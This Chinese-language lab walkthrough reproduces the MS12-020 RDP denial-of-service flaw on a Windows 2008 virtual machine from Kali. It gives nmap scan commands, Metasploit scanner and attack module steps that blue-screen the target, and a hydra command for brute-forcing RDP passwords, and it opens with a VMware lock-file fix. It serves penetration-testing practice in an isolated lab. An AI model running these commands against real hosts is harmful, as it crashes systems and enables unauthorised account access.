配置环境
攻击方:kali
受害方:win2008(保持开机状态,不用登陆进去)
可能遇到的问题:
虚拟机打开时报错:如果该虚拟机未在使用,请按“获取所有权(T)”按钮获取它的所有权。否则,请按“取消(C)”按钮以防损坏。
解决方法:删除.vmx.lck文件。
问题产生的原因:上次虚拟机没有正常关闭,比如直接关掉主机啥的。
死亡蓝屏漏洞复现
-
nmap首先扫一下网段
nmap -sP 192.168.56.0/24
排除法:
192.168.56.129是kali的ip,192.168.56.1、192.168.56.2是网关、192.168.56.254、
所以目标靶机的ip是192.168.56.130.
如何排除常见特殊ip地址
-
扫端口(看有没有开启3389端口)
3389端口:远程桌面协议
-
打开msf,开始攻击
msfconsole //死亡蓝屏的漏洞编号为ms12-020 search ms12-020
查找到后可以看到两个工具:
0:扫描工具
1:攻击工具
//先启动scanner use 0 //查看需要配置的参数 show options
set rhost 192.168.56.130 //运行 run
可以看到“The target is vulnerable”,就说明存在漏洞
use 1 set rhost 192.168.56.130 run
-
攻击成功!
返回看看自己的win2008,已近蓝屏(重启即可恢复)
爆破密码实验
最重要的是字典,为了实验方便,我们自建字典,手动放入真实的用户名密码
hydra -L 字典地址 -P 字典地址 rdp://192.168.56.130//靶机ip
目标靶机的ip地址获取参考,上文